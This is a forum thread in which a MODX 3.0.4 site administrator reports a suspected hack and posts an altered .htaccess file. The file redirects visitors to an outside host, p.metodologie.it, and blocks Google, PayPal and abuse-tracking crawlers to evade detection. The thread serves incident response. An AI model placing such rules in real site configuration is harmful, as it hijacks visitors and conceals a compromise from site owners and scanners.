MODX 3.0.4 .htaccess Hack?

Security
1

Today I found a security problem on a MODX 3.0.4 installation. The .htaccess file had been changed in this way:

RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/(?:\ Ballot169)?
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d

RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/(?:\ Ballot169)?
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^(.+)/(.+)/?$ https://p.metodologie.it/session/ [NC,QSA,L]
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} google\.com [NC,OR]
RewriteCond %{HTTP_REFERER} google\.com
RewriteCond %{HTTP_REFERER} paypal\.com
RewriteCond %{HTTP_REFERER} firefox\.com
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/(?:\ Ballot169)?
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F]
RewriteCond %{HTTP_USER_AGENT} ^googlebot [OR]
...
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/(?:\ Ballot169)?
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^.* - [F,L]
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^http(s)?://(www\.)?http://safebrowsing-cache.google.com/.*$ [NC]
RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/(?:\ Ballot169)?
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F,L]
############################

#Anti ZS spyeyes Tracker .htaccess #

#84.74.14?.*               #

############################

RewriteEngine on

RewriteCond %{HTTP_REFERER} ^http://.*google\.com [NC]

RewriteCond %{REQUEST_URI} !^/\.well-known/acme-challenge/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/cpanel-dcv/[0-9a-zA-Z_-]+$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/(?:\ Ballot169)?
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F]

###########################################

#Spider Blocker/Crawler/Bot's             #

###########################################

Order Deny,Allow

Deny from 82.165.47.*
...

Deny from 212.12.114.*

Deny from 213.160.90.*

Deny from *.abuse.ch

Deny from *.google.com

I was not allowed to update the installation because the client was doing it on its own. I don’t find any security problems on the MODX version 3.0.4 used or the installed extras.

So I think the change/hack comes from another application in the shared hosting and is not MODX related. Has anyone discovered a similar problem in MODX? For my first view, only the .htaccess is changed.

2

Some of the rules come from cPanel. What exactly do you see as suspicious?

3

Thanks, its not my .htaccess file anymore and the manager login is getting redirected. There is no action logged by the client that he made any changes. And I don’t think Strato made these changes. Hmm, I will keep an eye on this.